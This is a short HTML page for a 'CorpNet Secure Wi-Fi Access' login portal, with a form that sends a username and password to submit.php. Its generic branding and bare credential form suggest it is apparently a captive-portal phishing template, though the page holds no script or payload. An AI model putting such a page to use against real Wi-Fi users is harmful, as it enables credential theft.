
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Secure Wi-Fi Login</title>
  <style>
    body {
      background-color: #0d0d0d;
      font-family: "Courier New", monospace;
      color: #f2f2f2;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      padding: 0 10px;
    }
    .login-container {
      background-color: #1a1a1a;
      padding: 30px 20px;
      border-radius: 12px;
      box-shadow: 0 0 20px rgba(0, 255, 255, 0.15);
      width: 100%;
      max-width: 360px;
      box-sizing: border-box;
    }
    .login-container h2 {
      text-align: center;
      color: #00ffff;
      font-size: 20px;
      margin-bottom: 20px;
    }
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border-radius: 4px;
      background-color: #333;
      color: #f2f2f2;
      border: none;
      box-sizing: border-box;
    }
    input[type="submit"] {
      background-color: #00ffff;
      color: #000;
      border: none;
      padding: 12px;
      margin-top: 16px;
      width: 100%;
      border-radius: 4px;
      font-weight: bold;
      cursor: pointer;
    }
    .footer {
      font-size: 10px;
      text-align: center;
      margin-top: 10px;
      color: #555;
    }
  </style>
</head>
<body>
  <div class="login-container">
    <h2>CorpNet Secure Wi-Fi Access</h2>
    <form method="POST" action="submit.php">
      <input type="text" name="user" placeholder="Username or Email" required />
      <input type="password" name="pass" placeholder="Password" required />
      <input type="submit" value="Login" />
    </form>
    <div class="footer">© 2025 CorpNet Systems</div>
  </div>
</body>
</html>
